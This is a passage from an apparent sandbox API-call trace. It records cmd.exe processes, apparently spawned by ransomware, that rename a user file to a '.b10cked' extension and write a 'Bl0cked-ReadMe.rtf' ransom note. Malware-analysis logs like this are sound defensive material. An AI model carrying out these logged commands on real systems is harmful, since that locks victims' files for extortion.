returned 4 [0193.821] 
_wcsicmp (_String1="move", _String2="RD") returned -5 [0193.821] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0193.821] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0193.821] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0193.821] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0193.821] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0193.821] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0193.821] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0193.821] _wcsicmp (_String1="move", _String2="VER") returned -9 [0193.821] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0193.821] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0193.821] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0193.821] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0193.821] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0193.821] _wcsicmp (_String1="move", _String2="START") returned -6 [0193.821] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0193.821] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0193.821] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0193.823] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0193.823] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0193.823] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f7bc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f7b4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f7b4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0193.823] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0193.823] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0193.823] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) 
returned 2 [0193.823] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0193.824] 
_wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0193.824] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0193.824] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0193.825] _wcsicmp (_String1="user.bmp", _String2=".") returned 71 [0193.825] _wcsicmp (_String1="user.bmp", _String2="..") returned 71 [0193.825] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\user.bmp")) returned 0x20 [0193.825] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3e1e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0193.825] SetErrorMode (uMode=0x0) returned 0x0 [0193.825] SetErrorMode (uMode=0x1) returned 0x0 [0193.825] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp", nBufferLength=0x104, lpBuffer=0x22f144, lpFilePart=0x22f12c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp", lpFilePart=0x22f12c*="user.bmp") returned 0x2c [0193.825] SetErrorMode (uMode=0x0) returned 0x1 [0193.825] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1")) returned 0x2012 [0193.825] _wcsicmp (_String1="user.bmp", _String2=".") returned 71 [0193.825] _wcsicmp (_String1="user.bmp", _String2="..") returned 71 [0193.825] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp" (normalized: 
"c:\\users\\alluse~1\\micros~1\\userac~1\\user.bmp")) returned 0x20 [0193.825] SetErrorMode (uMode=0x0) returned 0x0 [0193.825] SetErrorMode (uMode=0x1) returned 0x0 [0193.825] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp", nBufferLength=0x104, lpBuffer=0x22f5c0, lpFilePart=0x22f358 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp", lpFilePart=0x22f358*="user.bmp") returned 0x2c [0193.826] SetErrorMode (uMode=0x0) returned 0x1 [0193.826] SetErrorMode (uMode=0x0) returned 0x0 [0193.826] SetErrorMode (uMode=0x1) returned 0x0 [0193.826] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x22f7c8, lpFilePart=0x22f358 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked", lpFilePart=0x22f358*="user.bmp.b10cked") returned 0x34 [0193.826] SetErrorMode (uMode=0x0) returned 0x1 [0193.826] SetLastError (dwErrCode=0x0) [0193.826] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\user.bmp.b10cked")) returned 0xffffffff [0193.826] GetLastError () returned 0x2 [0193.826] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp", fInfoLevelId=0x1, lpFindFileData=0x22ecd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ecd4) returned 0x3d0e70 [0193.826] FindNextFileW (in: hFindFile=0x3d0e70, lpFindFileData=0x22ecd4 | out: lpFindFileData=0x22ecd4) returned 0 [0193.827] GetLastError () returned 0x12 [0193.827] FindClose (in: hFindFile=0x3d0e70 | out: hFindFile=0x3d0e70) returned 1 [0193.827] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp", fInfoLevelId=0x1, lpFindFileData=0x3e1be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3e1be0) returned 0x3d0e70 [0193.828] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x22ef6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked", lpFilePart=0x0) returned 0x34 [0193.828] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp", nBufferLength=0x104, lpBuffer=0x22ef6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp", lpFilePart=0x0) returned 0x2c [0193.828] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\user.bmp")) returned 0x20 [0193.828] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\user.bmp"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\user.bmp.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\user.bmp.b10cked"), dwFlags=0x3) returned 1 [0193.828] FindClose (in: hFindFile=0x3d0e70 | out: hFindFile=0x3d0e70) returned 1 [0193.828] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x22ef20 | out: _Buffer=" 1") returned 9 [0193.828] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.828] GetFileType (hFile=0x7) returned 0x2 [0193.886] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0193.886] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22eeac | out: lpMode=0x22eeac) returned 1 [0193.886] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.886] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x22eee0 | out: lpConsoleScreenBufferInfo=0x22eee0) returned 1 [0193.886] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0193.887] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, 
lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x22ef20 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0193.887] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x22ef04, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22ef04*=0x1a) returned 1 [0193.887] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.887] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0193.887] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.887] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0193.887] _get_osfhandle (_FileHandle=0) returned 0x3 [0193.887] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0193.887] SetConsoleInputExeNameW () returned 0x1 [0193.887] GetConsoleOutputCP () returned 0x1b5 [0193.887] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0193.887] SetThreadUILanguage (LangId=0x0) returned 0x409 [0193.888] exit (_Code=0) Process: id = "443" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167a0" os_pid = "0xa4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~2\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28533 start_va = 0x10000 end_va = 
0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28534 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 28535 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 28536 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 28537 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28538 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28539 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28540 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28541 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 28542 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28577 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28578 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" 
filename = "" Region: id = 28579 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28580 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 28581 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 28582 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28583 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28584 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28585 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28586 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28587 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28588 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 
region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28589 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28590 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28591 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 28592 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28593 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28594 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 28595 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 28596 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 28597 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 28598 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 28599 start_va = 0x500000 end_va = 0x10fffff entry_point = 0x0 region_type = pagefile_backed name 
= "pagefile_0x0000000000500000" filename = "" Region: id = 28600 start_va = 0x1100000 end_va = 0x1262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Thread: id = 635 os_tid = 0xb54 [0193.861] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fa3c | out: lpSystemTimeAsFileTime=0x12fa3c*(dwLowDateTime=0xa86d2960, dwHighDateTime=0x1d440a9)) [0193.861] GetCurrentProcessId () returned 0xa4c [0193.861] GetCurrentThreadId () returned 0xb54 [0193.861] GetTickCount () returned 0x3710a [0193.861] QueryPerformanceCounter (in: lpPerformanceCount=0x12fa34 | out: lpPerformanceCount=0x12fa34*=25064982460) returned 1 [0193.861] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0193.861] __set_app_type (_Type=0x1) [0193.861] __p__fmode () returned 0x76b331f4 [0193.861] __p__commode () returned 0x76b331fc [0193.861] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0193.861] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0193.862] GetCurrentThreadId () returned 0xb54 [0193.862] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb54) returned 0x38 [0193.862] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0193.862] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0193.862] SetThreadUILanguage (LangId=0x0) returned 0x409 [0193.862] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0193.862] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f9cc | out: phkResult=0x12f9cc*=0x0) returned 0x2 [0193.862] VirtualQuery (in: lpAddress=0x12fa03, lpBuffer=0x12f99c, dwLength=0x1c | out: 
lpBuffer=0x12f99c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0193.862] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f99c, dwLength=0x1c | out: lpBuffer=0x12f99c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0193.862] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f99c, dwLength=0x1c | out: lpBuffer=0x12f99c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0193.862] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f99c, dwLength=0x1c | out: lpBuffer=0x12f99c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0193.862] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f99c, dwLength=0x1c | out: lpBuffer=0x12f99c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0193.862] GetConsoleOutputCP () returned 0x1b5 [0193.862] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0193.862] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0193.862] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.862] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0193.863] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.863] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0193.863] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.863] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0193.863] _get_osfhandle (_FileHandle=0) returned 0x3 [0193.863] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0193.863] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0193.863] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0193.863] GetEnvironmentStringsW () returned 0x200170* [0193.863] FreeEnvironmentStringsW (penv=0x200170) returned 1 [0193.863] GetEnvironmentStringsW () returned 0x200170* [0193.864] FreeEnvironmentStringsW (penv=0x200170) returned 1 [0193.864] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e93c | out: phkResult=0x12e93c*=0x40) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x0, lpData=0x12e948*=0x98, lpcbData=0x12e940*=0x1000) returned 0x2 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x4, lpData=0x12e948*=0x1, lpcbData=0x12e940*=0x4) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x0, lpData=0x12e948*=0x1, lpcbData=0x12e940*=0x1000) returned 0x2 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x4, lpData=0x12e948*=0x0, lpcbData=0x12e940*=0x4) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x4, lpData=0x12e948*=0x40, lpcbData=0x12e940*=0x4) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x4, lpData=0x12e948*=0x40, lpcbData=0x12e940*=0x4) returned 0x0 [0193.864] 
RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x0, lpData=0x12e948*=0x40, lpcbData=0x12e940*=0x1000) returned 0x2 [0193.864] RegCloseKey (hKey=0x40) returned 0x0 [0193.864] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e93c | out: phkResult=0x12e93c*=0x40) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x0, lpData=0x12e948*=0x40, lpcbData=0x12e940*=0x1000) returned 0x2 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x4, lpData=0x12e948*=0x1, lpcbData=0x12e940*=0x4) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x0, lpData=0x12e948*=0x1, lpcbData=0x12e940*=0x1000) returned 0x2 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x4, lpData=0x12e948*=0x0, lpcbData=0x12e940*=0x4) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x4, lpData=0x12e948*=0x9, lpcbData=0x12e940*=0x4) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e944, lpData=0x12e948, lpcbData=0x12e940*=0x1000 | out: lpType=0x12e944*=0x4, lpData=0x12e948*=0x9, lpcbData=0x12e940*=0x4) returned 0x0 [0193.864] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, 
